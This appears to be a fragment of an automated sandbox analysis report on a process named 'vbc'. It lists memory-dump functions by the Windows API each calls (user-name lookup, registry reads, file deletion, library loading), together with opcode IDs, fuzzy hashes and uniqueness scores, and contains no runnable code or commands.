                                                              • Opcode Fuzzy Hash: 3578e99cc5c4ee51b20c7d2e7b768c0b91a9c74c4d3345eea400bb590d78fcb5
                                                              • Instruction Fuzzy Hash: 4E51A030A112099FCB04EF74D945AAEBBF5EF85304F04896AE512DB391DF34E805CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: febf3a661bd83abc5ef339661d69b97157fa393700cf543a0f389a8fd46113ec
                                                              • Instruction ID: 97b5adb6a38b775750bd783e08a7a38a198cb34fa8416eebf13876913e035961
                                                              • Opcode Fuzzy Hash: febf3a661bd83abc5ef339661d69b97157fa393700cf543a0f389a8fd46113ec
                                                              • Instruction Fuzzy Hash: 0181DA7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 96430f754b233d192d6baa40dccbe754645c4e3292202382b435c27c9e18ac39
                                                              • Instruction ID: d3267ab6aba437ba03119b1350a20ff9bcdca5006cbc2bd4a6d9ed7bfd9f79d0
                                                              • Opcode Fuzzy Hash: 96430f754b233d192d6baa40dccbe754645c4e3292202382b435c27c9e18ac39
                                                              • Instruction Fuzzy Hash: 9781DC7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: fc586f75e7ef1bfb599b5adbec3bc5a6f97d50ff3cd726a1924bbfa01faeb619
                                                              • Instruction ID: 11d94465556f7e58517aea6fe98e0c1794d1c27ba6565a6ed9ca35adb6aec64b
                                                              • Opcode Fuzzy Hash: fc586f75e7ef1bfb599b5adbec3bc5a6f97d50ff3cd726a1924bbfa01faeb619
                                                              • Instruction Fuzzy Hash: 6C81CB7490A268CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: cb3c22ac80a3ad184901eb8b8ac078c6a176902e30b6dee7683d769a0270c7ce
                                                              • Instruction ID: 3156272fa49386ed370026be87cf275c694db9a8b2899cab3f466114324046dc
                                                              • Opcode Fuzzy Hash: cb3c22ac80a3ad184901eb8b8ac078c6a176902e30b6dee7683d769a0270c7ce
                                                              • Instruction Fuzzy Hash: 5371F97490A268CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 3fa6bf165b71eb5a6117fc6c334d23a0da9f430adad64de1b47026648d34bbcd
                                                              • Instruction ID: 6005bb1df2dfcc732d1bc882aef1c43edbdaf27ddd0fa7266e7f1cee28957eee
                                                              • Opcode Fuzzy Hash: 3fa6bf165b71eb5a6117fc6c334d23a0da9f430adad64de1b47026648d34bbcd
                                                              • Instruction Fuzzy Hash: 3271C97490A268CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 5b4c733a7878b89cdfe742ce046334ce3816d18b10e09c18f99c62f0caab4320
                                                              • Instruction ID: 06fbe93843fbc3654c830ddc463436c8e14b7219a9b1804573c1fa15923c2264
                                                              • Opcode Fuzzy Hash: 5b4c733a7878b89cdfe742ce046334ce3816d18b10e09c18f99c62f0caab4320
                                                              • Instruction Fuzzy Hash: 4B512370D002188FDB14CFA9D889BDDBBF1BF49318F15851AE816AB390DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 5a12f52a1eb56e82ca84f5296579522217e64654dca85a88c0cfb3388289c866
                                                              • Instruction ID: bf5aa2940a1a4817bd60b31fb1824df79453f69118db50ceaa86bb1472b588d8
                                                              • Opcode Fuzzy Hash: 5a12f52a1eb56e82ca84f5296579522217e64654dca85a88c0cfb3388289c866
                                                              • Instruction Fuzzy Hash: 3B512270D002188FDB18CFA9D899BEDBBB2BF49318F158529E815AB350DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 0d871a5b3b9e11dd40bbc70034b5d5968fa54b3e47b1d647499102c254fca410
                                                              • Instruction ID: 668ec17fa583667279a5f98191cfd961b19b9f399bc7f931203d52311564efd6
                                                              • Opcode Fuzzy Hash: 0d871a5b3b9e11dd40bbc70034b5d5968fa54b3e47b1d647499102c254fca410
                                                              • Instruction Fuzzy Hash: F7511370D002188FDF14CFA9D889BDDBBB1BF48318F158519E815AB390DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: fb46221596f9d62264908653a5dedf69e95ee5e1c174e2350f8d4abbaa09dc9f
                                                              • Instruction ID: 3b4321a7cb0b85f3986d04a4d3c48602e3353420ccdf055808f572a2be84cf1e
                                                              • Opcode Fuzzy Hash: fb46221596f9d62264908653a5dedf69e95ee5e1c174e2350f8d4abbaa09dc9f
                                                              • Instruction Fuzzy Hash: 1961CA7490A268CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0A2766F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: QueryValue

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0A276434
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Open

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(00000000), ref: 09EE6848
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 04F0C9BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 04F0C9BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad

                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0A2766F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: QueryValue

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0A276434
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Open

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(00000000), ref: 09EE6848
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile

                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 04F04D42
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 23c1bf211e70aa2e09c2b7906a774a6735b6604befb586d16c40ef8e48ac7907
                                                              • Instruction ID: a02d97dbf92761942f3f8fd21515f48d58d2be20b1bc413efc976ba84e2091b7
                                                              • Opcode Fuzzy Hash: 23c1bf211e70aa2e09c2b7906a774a6735b6604befb586d16c40ef8e48ac7907
                                                              • Instruction Fuzzy Hash: A621BA74A06268CFCB65DF64E8886D9B7B2BF4634AF1040D9D50AA3740CF355E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 04F04D42
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID:
                                                              • API String ID: 2118026453-0
                                                              • Opcode ID: 22f352f3852709965244bc25992410f148feabb1566de6b0a7fd02f396df149d
                                                              • Instruction ID: ed2abedd66ea9be1032496f3ea0968b0ee344e985528d447741285363982d073
                                                              • Opcode Fuzzy Hash: 22f352f3852709965244bc25992410f148feabb1566de6b0a7fd02f396df149d
                                                              • Instruction Fuzzy Hash: AB11B1719013499FDB10DFA9D50879EBBF4FB88314F248429D405A3680CB796585CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 664dd7efa7cf4a465a02df27634ec3431896c304030e18d02387bffb5e7f9bf9
                                                              • Instruction ID: 6883111d05350ff238818de759089e479178ebc363271c6eddecca4d9eea4f40
                                                              • Opcode Fuzzy Hash: 664dd7efa7cf4a465a02df27634ec3431896c304030e18d02387bffb5e7f9bf9
                                                              • Instruction Fuzzy Hash: 9111BA74A06258CFCB25DF64E8886E9B7B2BF4634AF1040D9D50AA3740CB355E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: a2a1d27ebaf35924316c537b856216e7c4883a471e9c64a67c998c51fff6a7e4
                                                              • Instruction ID: 34a8c7022e127f17bbfba27866f80d21eba48abdd6b0a038d175a8603e363221
                                                              • Opcode Fuzzy Hash: a2a1d27ebaf35924316c537b856216e7c4883a471e9c64a67c998c51fff6a7e4
                                                              • Instruction Fuzzy Hash: 451145B18002488FDB20DFA9D548BDEFBF4EF48324F25845AD519A7200C338A644CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 0929b717ead753a029075379afd44a8c7be898d07096c6174b3aeff1bc15a81e
                                                              • Instruction ID: adde5ac4e0d6eb446849e93e6ba522afb25a6ae8b3049d66e6d4c50400afb320
                                                              • Opcode Fuzzy Hash: 0929b717ead753a029075379afd44a8c7be898d07096c6174b3aeff1bc15a81e
                                                              • Instruction Fuzzy Hash: 211135B58003488FCB10DFAAD548BCEFBF4EB48324F24841AD519A7300C378AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 26fdc75090680c20ad73acfccaa212835ef615a5e912f4d620ddceff026d3efb
                                                              • Instruction ID: e6456d0e33e83f9057394a67c94e7061882b3f8c0058ce3d461e1dfdc3261d69
                                                              • Opcode Fuzzy Hash: 26fdc75090680c20ad73acfccaa212835ef615a5e912f4d620ddceff026d3efb
                                                              • Instruction Fuzzy Hash: 0D11E674E06268CFCB26DB64E8886D9B7B2BF46346F1040E9D50AA3240CB705E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 01ae7ff3afc5c478928a4e511113d7a68cea68b260f1398604c1e26ec15a90cd
                                                              • Instruction ID: 2787ac5a693c748cbd44e3b6f96c55d76b5eb64e0d87e9aa94a626ffd094decb
                                                              • Opcode Fuzzy Hash: 01ae7ff3afc5c478928a4e511113d7a68cea68b260f1398604c1e26ec15a90cd
                                                              • Instruction Fuzzy Hash: 7001D374A06268CFCB25EB64E8886D9B7B1FF4630AF1041EAD44AA3240CB705E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 56d67800996a9b34a8231b3cd1d399e936f9ae07778391ddb8c1f15895203270
                                                              • Instruction ID: 17c355302a42bd9bb9b027dc9041aada733570291c199cf275fee9e726c2a559
                                                              • Opcode Fuzzy Hash: 56d67800996a9b34a8231b3cd1d399e936f9ae07778391ddb8c1f15895203270
                                                              • Instruction Fuzzy Hash: D7F0B275A062688FCB61DB68E8886D9B7B1FF45319F1040E6D58AA3240CF705EC18F56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 4205af9892ce2cc7c71d3d1c19a444a4fccbc026970098be778788a096df7199
                                                              • Instruction ID: fc10c8b14e3c6e42fc2458c26ce05515f41e3a834dfcff16ab1c0a2ace183eb9
                                                              • Opcode Fuzzy Hash: 4205af9892ce2cc7c71d3d1c19a444a4fccbc026970098be778788a096df7199
                                                              • Instruction Fuzzy Hash: 6BF0A575E062288FCB21DB68E9846DDB3B1FF45319F1050E6D54DA3240CB705E808F55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536797534.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_c0d000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29b841b73e437d04d44102f6cdf86350714d78796403148926c1c95b70aaee7d
                                                              • Instruction ID: 91f59546b4badd78e9fcede3db423aecd6fe08701dc40a02c2f7de6737bbf3e2
                                                              • Opcode Fuzzy Hash: 29b841b73e437d04d44102f6cdf86350714d78796403148926c1c95b70aaee7d
                                                              • Instruction Fuzzy Hash: 9542C37584F7C26FCB478B3888766417FB16F2324871A00DBD4D1CE4B3D61A8A1ADB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4567660c38122a8b09878eaf6ee06f7c3ff97523311bc688620557ca463dffe8
                                                              • Instruction ID: 1841a61d7a3f2d0f330cf0ca3e865184eb91e5f88cbe93335773c757fed2853b
                                                              • Opcode Fuzzy Hash: 4567660c38122a8b09878eaf6ee06f7c3ff97523311bc688620557ca463dffe8
                                                              • Instruction Fuzzy Hash: 7B213AB1504248DFDB05DF14D9C4B36BBA6FB94324F24C5A9DA094B346C336E85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8762885cdefcc972edee20bab1b07a037568adac13bb5f317ad96b15221f107b
                                                              • Instruction ID: a24e6951d2b6bd93926ff2ac5875f95ba5a7ce2490c030217da463559b0bad6c
                                                              • Opcode Fuzzy Hash: 8762885cdefcc972edee20bab1b07a037568adac13bb5f317ad96b15221f107b
                                                              • Instruction Fuzzy Hash: 8F213AB1504348DFDB05CF54D9C4B36BBE6FBA8328F2485A9DA054B246C336D849CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536797534.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_c0d000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 000016eb3156494b5422efde235160a5f1f50ae937e7e815ecd02abc772f5f9f
                                                              • Instruction ID: ace501b874565df4ea88200745ee01c7cda5b69a8a906db39f2eddf0491893f3
                                                              • Opcode Fuzzy Hash: 000016eb3156494b5422efde235160a5f1f50ae937e7e815ecd02abc772f5f9f
                                                              • Instruction Fuzzy Hash: 8E2107B1644244DFDB04DF94D9C4B26BBA5FB88324F24C96DD9094B386C33AD846CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

